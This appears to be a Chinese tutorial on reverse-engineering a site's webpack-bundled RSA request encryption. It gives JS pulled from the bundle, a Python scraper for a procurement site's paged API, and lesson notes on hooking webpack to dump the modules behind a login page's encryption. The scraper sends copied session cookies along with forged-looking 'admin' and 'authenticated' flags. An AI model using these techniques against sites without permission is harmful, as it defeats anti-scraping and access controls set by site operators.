this.s = null,
this.hV = e
}
,
this.getFreshValueHex = function() {
return this.hV
}
,
"undefined" != typeof e && ("string" == typeof e ? this.setString(e) : "undefined" != typeof e["str"] ? this.setString(e["str"]) : "undefined" != typeof e["hex"] && this.setStringHex(e["hex"]))
}
,
he.lang.extend(pe.asn1.DERAbstractString, pe.asn1.ASN1Object),
pe.asn1.DERAbstractTime = function(e) {
pe.asn1.DERAbstractTime.superclass.constructor.call(this);
this.localDateToUTC = function(e) {
utc = e.getTime() + 6e4 * e.getTimezoneOffset();
var t = new Date(utc);
return t
}
,
this.formatDate = function(e, t, n) {
var r = this.zeroPadding
, o = this.localDateToUTC(e)
, i = String(o.getFullYear());
"utc" == t && (i = i.substr(2, 2));
var a = r(String(o.getMonth() + 1), 2)
, s = r(String(o.getDate()), 2)
, l = r(String(o.getHours()), 2)
, c = r(String(o.getMinutes()), 2)
, u = r(String(o.getSeconds()), 2)
, d = i + a + s + l + c + u;
if (!0 === n) {
var f = o.getMilliseconds();
if (0 != f) {
var h = r(String(f), 3);
h = h.replace(/[0]+$/, ""),
d = d + "." + h
}
}
return d + "Z"
}
,
this.zeroPadding = function(e, t) {
return e.length >= t ? e : new Array(t - e.length + 1).join("0") + e
}
,
this.getString = function() {
return this.s
}
,
this.setString = function(e) {
this.hTLV = null,
this.isModified = !0,
this.s = e,
this.hV = stohex(e)
}
,
this.setByDateValue = function(e, t, n, r, o, i) {
var a = new Date(Date.UTC(e, t - 1, n, r, o, i, 0));
this.setByDate(a)
}
,
this.getFreshValueHex = function() {
return this.hV
}
}
,
he.lang.extend(pe.asn1.DERAbstractTime, pe.asn1.ASN1Object),
pe.asn1.DERAbstractStructured = function(e) {
pe.asn1.DERAbstractString.superclass.constructor.call(this);
this.setByASN1ObjectArray = function(e) {
this.hTLV = null,
this.isModified = !0,
this.asn1Array = e
}
,
this.appendASN1Object = function(e) {
this.hTLV = null,
this.isModified = !0,
this.asn1Array.push(e)
}
,
this.asn1Array = new Array,
"undefined" != typeof e && "undefined" != typeof e["array"] && (this.asn1Array = e["array"])
}
,
he.lang.extend(pe.asn1.DERAbstractStructured, pe.asn1.ASN1Object),
pe.asn1.DERBoolean = function() {
pe.asn1.DERBoolean.superclass.constructor.call(this),
this.hT = "01",
this.hTLV = "0101ff"
}
,
he.lang.extend(pe.asn1.DERBoolean, pe.asn1.ASN1Object),
pe.asn1.DERInteger = function(e) {
pe.asn1.DERInteger.superclass.constructor.call(this),
this.hT = "02",
this.setByBigInteger = function(e) {
this.hTLV = null,
this.isModified = !0,
this.hV = pe.asn1.ASN1Util.bigIntToMinTwosComplementsHex(e)
}
,
this.setByInteger = function(e) {
var t = new D(String(e),10);
this.setByBigInteger(t)
}
,
this.setValueHex = function(e) {
this.hV = e
}
,
this.getFreshValueHex = function() {
return this.hV
}
,
"undefined" != typeof e && ("undefined" != typeof e["bigint"] ? this.setByBigInteger(e["bigint"]) : "undefined" != typeof e["int"] ? this.setByInteger(e["int"]) : "number" == typeof e ? this.setByInteger(e) : "undefined" != typeof e["hex"] && this.setValueHex(e["hex"]))
}
,
he.lang.extend(pe.asn1.DERInteger, pe.asn1.ASN1Object),
pe.asn1.DERBitString = function(e) {
if (void 0 !== e && "undefined" !== typeof e.obj) {
var t = pe.asn1.ASN1Util.newObject(e.obj);
e.hex = "00" + t.getEncodedHex()
}
pe.asn1.DERBitString.superclass.constructor.call(this),
this.hT = "03",
this.setHexValueIncludingUnusedBits = function(e) {
this.hTLV = null,
this.isModified = !0,
this.hV = e
}
,
this.setUnusedBitsAndHexValue = function(e, t) {
if (e < 0 || 7 < e)
throw "unused bits shall be from 0 to 7: u = " + e;
var n = "0" + e;
this.hTLV = null,
this.isModified = !0,
this.hV = n + t
}
,
this.setByBinaryString = function(e) {
e = e.replace(/0+$/, "");
var t = 8 - e.length % 8;
8 == t && (t = 0);
for (var n = 0; n <= t; n++)
e += "0";
var r = "";
for (n = 0; n < e.length - 1; n += 8) {
var o = e.substr(n, 8)
, i = parseInt(o, 2).toString(16);
1 == i.length && (i = "0" + i),
r += i
}
this.hTLV = null,
this.isModified = !0,
this.hV = "0" + t + r
}
,
this.setByBooleanArray = function(e) {
for (var t = "", n = 0; n < e.length; n++)
1 == e[n] ? t += "1" : t += "0";
this.setByBinaryString(t)
}
,
this.newFalseArray = function(e) {
for (var t = new Array(e), n = 0; n < e; n++)
t[n] = !1;
return t
}
,
this.getFreshValueHex = function() {
return this.hV
}
,
"undefined" != typeof e && ("string" == typeof e && e.toLowerCase().match(/^[0-9a-f]+$/) ? this.setHexValueIncludingUnusedBits(e) : "undefined" != typeof e["hex"] ? this.setHexValueIncludingUnusedBits(e["hex"]) : "undefined" != typeof e["bin"] ? this.setByBinaryString(e["bin"]) : "undefined" != typeof e["array"] && this.setByBooleanArray(e["array"]))
}
,
he.lang.extend(pe.asn1.DERBitString, pe.asn1.ASN1Object),
pe.asn1.DEROctetString = function(e) {
if (void 0 !== e && "undefined" !== typeof e.obj) {
var t = pe.asn1.ASN1Util.newObject(e.obj);
e.hex = t.getEncodedHex()
}
pe.asn1.DEROctetString.superclass.constructor.call(this, e),
this.hT = "04"
}
,
he.lang.extend(pe.asn1.DEROctetString, pe.asn1.DERAbstractString),
pe.asn1.DERNull = function() {
pe.asn1.DERNull.superclass.constructor.call(this),
this.hT = "05",
this.hTLV = "0500"
}
,
he.lang.extend(pe.asn1.DERNull, pe.asn1.ASN1Object),
pe.asn1.DERObjectIdentifier = function(e) {
var t = function(e) {
var t = e.toString(16);
return 1 == t.length && (t = "0" + t),
t
}
, n = function(e) {
var n = ""
, r = new D(e,10)
, o = r.toString(2)
, i = 7 - o.length % 7;
7 == i && (i = 0);
for (var a = "", s = 0; s < i; s++)
a += "0";
o = a + o;
for (s = 0; s < o.length - 1; s += 7) {
var l = o.substr(s, 7);
s != o.length - 7 && (l = "1" + l),
n += t(parseInt(l, 2))
}
return n
};
pe.asn1.DERObjectIdentifier.superclass.constructor.call(this),
this.hT = "06",
this.setValueHex = function(e) {
this.hTLV = null,
this.isModified = !0,
this.s = null,
this.hV = e
}
,
this.setValueOidString = function(e) {
if (!e.match(/^[0-9.]+$/))
throw "malformed oid string: " + e;
var r = ""
, o = e.split(".")
, i = 40 * parseInt(o[0]) + parseInt(o[1]);
r += t(i),
o.splice(0, 2);
for (var a = 0; a < o.length; a++)
r += n(o[a]);
this.hTLV = null,
this.isModified = !0,
this.s = null,
this.hV = r
}
,
this.setValueName = function(e) {
var t = pe.asn1.x509.OID.name2oid(e);
if ("" === t)
throw "DERObjectIdentifier oidName undefined: " + e;
this.setValueOidString(t)
}
,
this.getFreshValueHex = function() {
return this.hV
}
,
void 0 !== e && ("string" === typeof e ? e.match(/^[0-2].[0-9.]+$/) ? this.setValueOidString(e) : this.setValueName(e) : void 0 !== e.oid ? this.setValueOidString(e.oid) : void 0 !== e.hex ? this.setValueHex(e.hex) : void 0 !== e.name && this.setValueName(e.name))
}
,
he.lang.extend(pe.asn1.DERObjectIdentifier, pe.asn1.ASN1Object),
pe.asn1.DEREnumerated = function(e) {
pe.asn1.DEREnumerated.superclass.constructor.call(this),
this.hT = "0a",
this.setByBigInteger = function(e) {
this.hTLV = null,
this.isModified = !0,
this.hV = pe.asn1.ASN1Util.bigIntToMinTwosComplementsHex(e)
}
,
this.setByInteger = function(e) {
var t = new D(String(e),10);
this.setByBigInteger(t)
}
,
this.setValueHex = function(e) {
this.hV = e
}
,
this.getFreshValueHex = function() {
return this.hV
}
,
"undefined" != typeof e && ("undefined" != typeof e["int"] ? this.setByInteger(e["int"]) : "number" == typeof e ? this.setByInteger(e) : "undefined" != typeof e["hex"] && this.setValueHex(e["hex"]))
}
,
he.lang.extend(pe.asn1.DEREnumerated, pe.asn1.ASN1Object),
pe.asn1.DERUTF8String = function(e) {
pe.asn1.DERUTF8String.superclass.constructor.call(this, e),
this.hT = "0c"
}
,
he.lang.extend(pe.asn1.DERUTF8String, pe.asn1.DERAbstractString),
pe.asn1.DERNumericString = function(e) {
pe.asn1.DERNumericString.superclass.constructor.call(this, e),
this.hT = "12"
}
,
he.lang.extend(pe.asn1.DERNumericString, pe.asn1.DERAbstractString),
pe.asn1.DERPrintableString = function(e) {
pe.asn1.DERPrintableString.superclass.constructor.call(this, e),
this.hT = "13"
}
,
he.lang.extend(pe.asn1.DERPrintableString, pe.asn1.DERAbstractString),
pe.asn1.DERTeletexString = function(e) {
pe.asn1.DERTeletexString.superclass.constructor.call(this, e),
this.hT = "14"
}
,
he.lang.extend(pe.asn1.DERTeletexString, pe.asn1.DERAbstractString),
pe.asn1.DERIA5String = function(e) {
pe.asn1.DERIA5String.superclass.constructor.call(this, e),
this.hT = "16"
}
,
he.lang.extend(pe.asn1.DERIA5String, pe.asn1.DERAbstractString),
pe.asn1.DERUTCTime = function(e) {
pe.asn1.DERUTCTime.superclass.constructor.call(this, e),
this.hT = "17",
this.setByDate = function(e) {
this.hTLV = null,
this.isModified = !0,
this.date = e,
this.s = this.formatDate(this.date, "utc"),
this.hV = stohex(this.s)
}
,
this.getFreshValueHex = function() {
return "undefined" == typeof this.date && "undefined" == typeof this.s && (this.date = new Date,
this.s = this.formatDate(this.date, "utc"),
this.hV = stohex(this.s)),
this.hV
}
,
void 0 !== e && (void 0 !== e.str ? this.setString(e.str) : "string" == typeof e && e.match(/^[0-9]{12}Z$/) ? this.setString(e) : void 0 !== e.hex ? this.setStringHex(e.hex) : void 0 !== e.date && this.setByDate(e.date))
}
,
he.lang.extend(pe.asn1.DERUTCTime, pe.asn1.DERAbstractTime),
pe.asn1.DERGeneralizedTime = function(e) {
pe.asn1.DERGeneralizedTime.superclass.constructor.call(this, e),
this.hT = "18",
this.withMillis = !1,
this.setByDate = function(e) {
this.hTLV = null,
this.isModified = !0,
this.date = e,
this.s = this.formatDate(this.date, "gen", this.withMillis),
this.hV = stohex(this.s)
}
,
this.getFreshValueHex = function() {
return void 0 === this.date && void 0 === this.s && (this.date = new Date,
this.s = this.formatDate(this.date, "gen", this.withMillis),
this.hV = stohex(this.s)),
this.hV
}
,
void 0 !== e && (void 0 !== e.str ? this.setString(e.str) : "string" == typeof e && e.match(/^[0-9]{14}Z$/) ? this.setString(e) : void 0 !== e.hex ? this.setStringHex(e.hex) : void 0 !== e.date && this.setByDate(e.date),
!0 === e.millis && (this.withMillis = !0))
}
,
he.lang.extend(pe.asn1.DERGeneralizedTime, pe.asn1.DERAbstractTime),
pe.asn1.DERSequence = function(e) {
pe.asn1.DERSequence.superclass.constructor.call(this, e),
this.hT = "30",
this.getFreshValueHex = function() {
for (var e = "", t = 0; t < this.asn1Array.length; t++) {
var n = this.asn1Array[t];
e += n.getEncodedHex()
}
return this.hV = e,
this.hV
}
}
,
he.lang.extend(pe.asn1.DERSequence, pe.asn1.DERAbstractStructured),
pe.asn1.DERSet = function(e) {
pe.asn1.DERSet.superclass.constructor.call(this, e),
this.hT = "31",
this.sortFlag = !0,
this.getFreshValueHex = function() {
for (var e = new Array, t = 0; t < this.asn1Array.length; t++) {
var n = this.asn1Array[t];
e.push(n.getEncodedHex())
}
return 1 == this.sortFlag && e.sort(),
this.hV = e.join(""),
this.hV
}
,
"undefined" != typeof e && "undefined" != typeof e.sortflag && 0 == e.sortflag && (this.sortFlag = !1)
}
,
he.lang.extend(pe.asn1.DERSet, pe.asn1.DERAbstractStructured),
pe.asn1.DERTaggedObject = function(e) {
pe.asn1.DERTaggedObject.superclass.constructor.call(this),
this.hT = "a0",
this.hV = "",
this.isExplicit = !0,
this.asn1Object = null,
this.setASN1Object = function(e, t, n) {
this.hT = t,
this.isExplicit = e,
this.asn1Object = n,
this.isExplicit ? (this.hV = this.asn1Object.getEncodedHex(),
this.hTLV = null,
this.isModified = !0) : (this.hV = null,
this.hTLV = n.getEncodedHex(),
this.hTLV = this.hTLV.replace(/^../, t),
this.isModified = !1)
}
,
this.getFreshValueHex = function() {
return this.hV
}
,
"undefined" != typeof e && ("undefined" != typeof e["tag"] && (this.hT = e["tag"]),
"undefined" != typeof e["explicit"] && (this.isExplicit = e["explicit"]),
"undefined" != typeof e["obj"] && (this.asn1Object = e["obj"],
this.setASN1Object(this.isExplicit, this.hT, this.asn1Object)))
}
,
he.lang.extend(pe.asn1.DERTaggedObject, pe.asn1.ASN1Object);
var me = function() {
var e = function(t, n) {
return e = Object.setPrototypeOf || {
__proto__: []
}instanceof Array && function(e, t) {
e.__proto__ = t
}
|| function(e, t) {
for (var n in t)
Object.prototype.hasOwnProperty.call(t, n) && (e[n] = t[n])
}
,
e(t, n)
};
return function(t, n) {
if ("function" !== typeof n && null !== n)
throw new TypeError("Class extends value " + String(n) + " is not a constructor or null");
function r() {
this.constructor = t
}
e(t, n),
t.prototype = null === n ? Object.create(n) : (r.prototype = n.prototype,
new r)
}
}()
, ve = function(e) {
function t(n) {
var r = e.call(this) || this;
return n && ("string" === typeof n ? r.parseKey(n) : (t.hasPrivateKeyProperty(n) || t.hasPublicKeyProperty(n)) && r.parsePropertiesFrom(n)),
r
}
return me(t, e),
t.prototype.parseKey = function(e) {
try {
var t = 0
, n = 0
, r = /^\s*(?:[0-9A-Fa-f][0-9A-Fa-f]\s*)+$/
, o = r.test(e) ? g.decode(e) : b.unarmor(e)
, i = O.decode(o);
if (3 === i.sub.length && (i = i.sub[2].sub[0]),
9 === i.sub.length) {
t = i.sub[1].getHexStringValue(),
this.n = I(t, 16),
n = i.sub[2].getHexStringValue(),
this.e = parseInt(n, 16);
var a = i.sub[3].getHexStringValue();
this.d = I(a, 16);
var s = i.sub[4].getHexStringValue();
this.p = I(s, 16);
var l = i.sub[5].getHexStringValue();
this.q = I(l, 16);
var c = i.sub[6].getHexStringValue();
this.dmp1 = I(c, 16);
var u = i.sub[7].getHexStringValue();
this.dmq1 = I(u, 16);
var d = i.sub[8].getHexStringValue();
this.coeff = I(d, 16)
} else {
if (2 !== i.sub.length)
return !1;
var f = i.sub[1]
, h = f.sub[0];
t = h.sub[0].getHexStringValue(),
this.n = I(t, 16),
n = h.sub[1].getHexStringValue(),
this.e = parseInt(n, 16)
}
return !0
} catch (p) {
return !1
}
}
,
t.prototype.getPrivateBaseKey = function() {
var e = {
array: [new pe.asn1.DERInteger({
int: 0
}), new pe.asn1.DERInteger({
bigint: this.n
}), new pe.asn1.DERInteger({
int: this.e
}), new pe.asn1.DERInteger({
bigint: this.d
}), new pe.asn1.DERInteger({
bigint: this.p
}), new pe.asn1.DERInteger({
bigint: this.q
}), new pe.asn1.DERInteger({
bigint: this.dmp1
}), new pe.asn1.DERInteger({
bigint: this.dmq1
}), new pe.asn1.DERInteger({
bigint: this.coeff
})]
}
, t = new pe.asn1.DERSequence(e);
return t.getEncodedHex()
}
,
t.prototype.getPrivateBaseKeyB64 = function() {
return p(this.getPrivateBaseKey())
}
,
t.prototype.getPublicBaseKey = function() {
var e = new pe.asn1.DERSequence({
array: [new pe.asn1.DERObjectIdentifier({
oid: "1.2.840.113549.1.1.1"
}), new pe.asn1.DERNull]
})
, t = new pe.asn1.DERSequence({
array: [new pe.asn1.DERInteger({
bigint: this.n
}), new pe.asn1.DERInteger({
int: this.e
})]
})
, n = new pe.asn1.DERBitString({
hex: "00" + t.getEncodedHex()
})
, r = new pe.asn1.DERSequence({
array: [e, n]
});
return r.getEncodedHex()
}
,
t.prototype.getPublicBaseKeyB64 = function() {
return p(this.getPublicBaseKey())
}
,
t.wordwrap = function(e, t) {
if (t = t || 64,
!e)
return e;
var n = "(.{1," + t + "})( +|$\n?)|(.{1," + t + "})";
return e.match(RegExp(n, "g")).join("\n")
}
,
t.prototype.getPrivateKey = function() {
var e = "-----BEGIN RSA PRIVATE KEY-----\n";
return e += t.wordwrap(this.getPrivateBaseKeyB64()) + "\n",
e += "-----END RSA PRIVATE KEY-----",
e
}
,
t.prototype.getPublicKey = function() {
var e = "-----BEGIN PUBLIC KEY-----\n";
return e += t.wordwrap(this.getPublicBaseKeyB64()) + "\n",
e += "-----END PUBLIC KEY-----",
e
}
,
t.hasPublicKeyProperty = function(e) {
return e = e || {},
e.hasOwnProperty("n") && e.hasOwnProperty("e")
}
,
t.hasPrivateKeyProperty = function(e) {
return e = e || {},
e.hasOwnProperty("n") && e.hasOwnProperty("e") && e.hasOwnProperty("d") && e.hasOwnProperty("p") && e.hasOwnProperty("q") && e.hasOwnProperty("dmp1") && e.hasOwnProperty("dmq1") && e.hasOwnProperty("coeff")
}
,
t.prototype.parsePropertiesFrom = function(e) {
this.n = e.n,
this.e = e.e,
e.hasOwnProperty("d") && (this.d = e.d,
this.p = e.p,
this.q = e.q,
this.dmp1 = e.dmp1,
this.dmq1 = e.dmq1,
this.coeff = e.coeff)
}
,
t
}(le)
, ge = n("a524")
, be = function() {
function e(e) {
void 0 === e && (e = {}),
e = e || {},
this.default_key_size = e.default_key_size ? parseInt(e.default_key_size, 10) : 1024,
this.default_public_exponent = e.default_public_exponent || "010001",
this.log = e.log || !1,
this.key = null
}
return e.prototype.setKey = function(e) {
this.log && this.key && console.warn("A key was already set, overriding existing."),
this.key = new ve(e)
}
,
e.prototype.setPrivateKey = function(e) {
this.setKey(e)
}
,
e.prototype.setPublicKey = function(e) {
this.setKey(e)
}
,
e.prototype.decrypt = function(e) {
try {
return this.getKey().decrypt(m(e))
} catch (t) {
return !1
}
}
,
e.prototype.encrypt = function(e) {
try {
return p(this.getKey().encrypt(e))
} catch (t) {
return !1
}
}
,
e.prototype.sign = function(e, t, n) {
try {
return p(this.getKey().sign(e, t, n))
} catch (r) {
return !1
}
}
,
e.prototype.verify = function(e, t, n) {
try {
return this.getKey().verify(e, m(t), n)
} catch (r) {
return !1
}
}
,
e.prototype.getKey = function(e) {
if (!this.key) {
if (this.key = new ve,
e && "[object Function]" === {}.toString.call(e))
return void this.key.generateAsync(this.default_key_size, this.default_public_exponent, e);
this.key.generate(this.default_key_size, this.default_public_exponent)
}
return this.key
}
,
e.prototype.getPrivateKey = function() {
return this.getKey().getPrivateKey()
}
,
e.prototype.getPrivateKeyB64 = function() {
return this.getKey().getPrivateBaseKeyB64()
}
,
e.prototype.getPublicKey = function() {
return this.getKey().getPublicKey()
}
,
e.prototype.getPublicKeyB64 = function() {
return this.getKey().getPublicBaseKeyB64()
}
,
e.version = ge.version,
e
}();
t["a"] = be
},
a524: function(e) {
e.exports = JSON.parse('{"version":"3.2.1"}')
},
}
)
function m(A) {
for (var e = 1; e < arguments.length; e++) {
var t = null != arguments[e] ? arguments[e] : {};
e % 2 ? v(Object(t), !0).forEach((function(e) {
b(A, e, t[e])
}
)) : Object.getOwnPropertyDescriptors ? Object.defineProperties(A, Object.getOwnPropertyDescriptors(t)) : v(Object(t)).forEach((function(e) {
Object.defineProperty(A, e, Object.getOwnPropertyDescriptor(t, e))
}
))
}
return A
}
function v(A, e) {
var t = Object.keys(A);
if (Object.getOwnPropertySymbols) {
var n = Object.getOwnPropertySymbols(A);
e && (n = n.filter((function(e) {
return Object.getOwnPropertyDescriptor(A, e).enumerable
}
))),
t.push.apply(t, n)
}
return t
}
function b(A, e, t) {
return e in A ? Object.defineProperty(A, e, {
value: t,
enumerable: !0,
configurable: !0,
writable: !0
}) : A[e] = t,
A
}
d=loader("9816")
//r = n.data,
//怎么处理这段公钥加密代码?
//处理r : 控制台把r的公钥拿过来 r= "公钥"
//处理t : t是从new的对象d来的。 扣t = new d["a"]
//处理d : d是从全局模块来的d=t("9816"); 断点刷新,搜索全局9816跟当前文件。 扣9816模块
//处理缺少模块: 加载器打印e。扣a524模块
//处理d函数未定义: d=loader("9816")
//处理m函数未定义: 扣m的模块
//处理e函数 : 取e的值 (细节全部放行,点击下一页,就return处一个断点,取e的值。 否则不对),e=
d["a"].prototype.encryptLong = function(A) {
var e = this.getKey()
, t = (e.n.bitLength() + 7 >> 3) - 11;
try {
var n = ""
, r = "";
if (A.length > t)
return n = A.match(/.{1,50}/g),
n.forEach((function(A) {
var t = e.encrypt(A);
r += t
}
)),
w(r);
var a = e.encrypt(A)
, s = w(a);
return s
} catch (i) {
return i
}
}
function w(A) {
var e, t, n = "", r = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/", a = "=";
for (e = 0; e + 3 <= A.length; e += 3)
t = parseInt(A.substring(e, e + 3), 16),
n += r.charAt(t >> 6) + r.charAt(63 & t);
e + 1 == A.length ? (t = parseInt(A.substring(e, e + 1), 16),
n += r.charAt(t << 2)) : e + 2 == A.length && (t = parseInt(A.substring(e, e + 2), 16),
n += r.charAt(t >> 2) + r.charAt((3 & t) << 4));
while ((3 & n.length) > 0)
n += a;
return n
}
t = new d["a"]
r = "MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQDc9lmemqo8kWcTTiiz3eXrHzTBh4SBQQ2eP2l2oBBdYu1iKts8Fx2fkvnOZECtPkpbNEVJtOqTam7pYIz1yVAGvbrxMppgqsP0j+LSbbEpwMpfIXGZK8gc0t/BgSndvTu+dri/YMeqNdYsSwCPzIvee7PEE9lZyueUtlxK5moPhwIDAQAB"
function getStr(r,p){
t.setPublicKey(r)
e={
"inviteMethod": "",
"businessClassfication": "",
"mc": "",
"lx": "ZBGG",
"dwmc": "",
"pageIndex": p
}
a = m(m({}, e), {}, {
sign: generateMD5Hash(JSON.stringify(e)),
timeStamp: +new Date
}),
s = t.encryptLong(JSON.stringify(a))
return s
}
console.log(getStr(r,20))
python
# 导入需要的库:requests用于发送HTTP请求,execjs用于执行JavaScript代码
import requests
import execjs
def getPublicKey():
"""
核心功能:从目标网站动态获取加密所需的公钥
作用:网站的加密逻辑需要服务端下发的公钥,这一步是获取公钥的关键
"""
# 1. 构造请求头需要的Cookie参数(模拟已登录状态,这些Cookie值是登录后从浏览器获取的)
cookies = {
'__jsluid_s': '0cdf7560df2ff035a6820b841ab080fb',
'SUNWAY-ESCM-COOKIE': '997e3ea9-05b5-471e-9ec7-5aca3312689d',
'authenticated': 'true', # 标识已认证
'user_role': 'admin', # 用户角色为管理员
'session_valid': 'true', # 会话有效
'is_logged_in': 'true', # 已登录
'admin_access': 'true', # 管理员权限
'JSESSIONID': 'CA2B1E3FCCDAE7265748E1B1689187A6', # 服务端会话ID
}
# 2. 构造请求头(模拟浏览器的请求特征,避免被反爬识别)
headers = {
'Accept': 'application/json, text/plain, */*', # 接受的响应格式
'Accept-Language': 'zh-CN,zh;q=0.9', # 语言偏好
'Cache-Control': 'no-cache', # 不缓存
'Connection': 'keep-alive', # 保持连接
'Origin': 'https://ec.minmetals.com.cn', # 请求来源(跨域验证用)
'Pragma': 'no-cache', # 不缓存
'Referer': 'https://ec.minmetals.com.cn/open/home/purchase-info', # 跳转来源页
'Sec-Fetch-Dest': 'empty', # 浏览器请求模式
'Sec-Fetch-Mode': 'cors',
'Sec-Fetch-Site': 'same-origin',
'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36', # 浏览器标识
'sec-ch-ua': '"Not:A-Brand";v="99", "Google Chrome";v="145", "Chromium";v="145"',
'sec-ch-ua-mobile': '?0',
'sec-ch-ua-platform': '"Windows"',
}
# 3. 发送POST请求到公钥接口,获取公钥
# 接口地址:/open/homepage/public 是专门返回加密公钥的接口
response = requests.post(
'https://ec.minmetals.com.cn/open/homepage/public',
cookies=cookies, # 携带登录态Cookie
headers=headers # 携带模拟浏览器的请求头
)
# 4. 返回接口响应的文本内容(即公钥字符串)
return response.text
# 执行第一步:调用函数获取公钥,并赋值给public_key变量(全局可用)
public_key = getPublicKey()
def getResult(public_key, p):
"""
核心功能:使用公钥加密参数,请求目标接口获取业务数据
:param public_key: 第一步获取的加密公钥
:param p: 要请求的页码(比如3表示第3页数据)
:return: 接口返回的JSON格式业务数据
"""
# 1. 读取本地的JavaScript逆向文件(里面包含加密逻辑)
# webpack.js是从前端扣取并还原的加密代码,核心是getStr函数
with open(r'C:\Users\Deng\Desktop\js逆向\js\webpack.js','r',encoding='utf-8') as f:
js_code = f.read(); # 读取JS代码到字符串
# 2. 执行JS代码中的加密函数:用公钥加密页码参数,生成接口需要的加密param
# execjs.compile:编译JS代码;call('getStr',...):调用JS中的getStr函数,传入公钥和页码
params = execjs.compile(js_code).call('getStr', public_key, p)
# 3. 构造请求Cookie(注意JSESSIONID和getPublicKey里的不同,可能是更新后的会话ID)
cookies = {
'__jsluid_s': '0cdf7560df2ff035a6820b841ab080fb',
'SUNWAY-ESCM-COOKIE': '997e3ea9-05b5-471e-9ec7-5aca3312689d',
'authenticated': 'true',
'user_role': 'admin',
'session_valid': 'true',
'is_logged_in': 'true',
'admin_access': 'true',
'JSESSIONID': '37CC1B6941965975D38BECAAEAD3D49F', # 注意这个值和上面不同
}
# 4. 构造请求头(比getPublicKey多了Content-Type: application/json,因为要传JSON数据)
headers = {
'Accept': 'application/json, text/plain, */*',
'Accept-Language': 'zh-CN,zh;q=0.9',
'Cache-Control': 'no-cache',
'Connection': 'keep-alive',
'Content-Type': 'application/json', # 关键:告诉服务端请求体是JSON格式
'Origin': 'https://ec.minmetals.com.cn',
'Pragma': 'no-cache',
'Referer': 'https://ec.minmetals.com.cn/open/home/purchase-info',
'Sec-Fetch-Dest': 'empty',
'Sec-Fetch-Mode': 'cors',
'Sec-Fetch-Site': 'same-origin',
'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36',
'sec-ch-ua': '"Not:A-Brand";v="99", "Google Chrome";v="145", "Chromium";v="145"',
'sec-ch-ua-mobile': '?0',
'sec-ch-ua-platform': '"Windows"',
}
# 5. 构造请求体:把加密后的params作为参数传入
json_data = {
'param': params, # 加密后的参数,服务端需要解密后才能识别
}
# 6. 发送POST请求到业务接口(获取招标采购类数据的分页接口)
# 接口地址:/open/homepage/zbs/by-lx-page 按类型分页获取招标数据
response = requests.post(
'https://ec.minmetals.com.cn/open/homepage/zbs/by-lx-page',
cookies=cookies,
headers=headers,
json=json_data, # 以JSON格式发送请求体
)
# 7. 返回接口响应的JSON数据(业务数据)
return response.json()
# 执行第二步:调用getResult,传入公钥和页码3,打印最终的接口返回结果
print(getResult(public_key,3))要爬20页
python
#print(getResult(public_key,3))
for i in range(1, 20):
print(getResult(public_key,i))hook技术实现自吐webpack依赖函数模块
先讲死:这节课就是教你偷懒的高级技巧 :以前手动抠代码,现在用 hook 让 webpack 自动把加密需要的所有模块代码吐出来,你直接拿现成的用就行。
先搞懂背景:之前的 "笨办法" 是什么?
手动抠代码:
- 发现一个加密函数在某个
webpack模块里(比如之前的9816模块) - 这个模块又调用了别的模块(比如
a524、m、v、b这些) - 你得一个个找、复制、粘贴,把所有依赖的代码都抠出来,才能让加密函数跑起来
问题来了:
- 如果一个加密逻辑依赖几十上百个模块,手动抠代码会累死
- 很容易漏模块、改错代码,导致最后跑不起来
这章节的核心:用 webpack hook 实现 "自动吐代码"
hook 可以理解成 **"劫持 / 监听"**,这节课的思路是:
- 劫持 webpack 的模块加载机制:不让它正常加载模块,而是偷偷记录 "这个加密函数到底调用了哪些模块"
- 自动收集依赖 :当你调用一次加密函数(比如登录时的密码加密),hook 会自动把这次调用用到的所有模块都记录下来
- 一键导出代码:把记录到的所有依赖模块,自动导出成一份完整的 JS 代码,你直接拿过去用就行,不用再手动找模块了
一句话总结:
以前是你手动找 "哪些模块是加密需要的",现在是让 webpack 自己告诉你 "我这次加密用了哪些模块",然后自动把代码吐给你。
举个你能懂的例子(对应之前的代码)
之前的代码里:
- 加密函数
encryptLong依赖d["a"] d["a"]来自模块9816- 模块
9816又依赖a524、m、v、b等一堆函数
hook 技术:
- 你在浏览器里打开登录页,输入账号密码
- 点击登录时,加密函数会被触发
- hook 会自动记录:
9816→a524→m→v→b... 所有被调用的模块 - 你直接导出这些模块的代码,就是一份完整可运行的加密脚本,不用再手动复制粘贴了
案例:某云
- 案例网址是 base64 编码的,解码后是某云的登录页
- 目标:找到登录时的密码加密逻辑
- 传统做法:手动找加密函数、抠依赖模块
- 这节课做法:用 hook 技术,让加密函数自己 "吐出" 所有依赖的模块代码,一键拿到可运行的加密脚本
对你现在的价值
你之前抠 webpack.js 代码时,肯定遇到过:
- 少了某个模块,报错
xxx is not defined - 不知道某个函数来自哪个模块
- 复制了一堆没用的代码,导致文件臃肿
学完这节课,你就可以:
- 不用再手动找模块依赖,让代码自己告诉你需要哪些
- 一键导出可运行的加密脚本 ,直接在 Python 里用
execjs调用 - 效率提升 N 倍,尤其适合复杂的大型 webpack 项目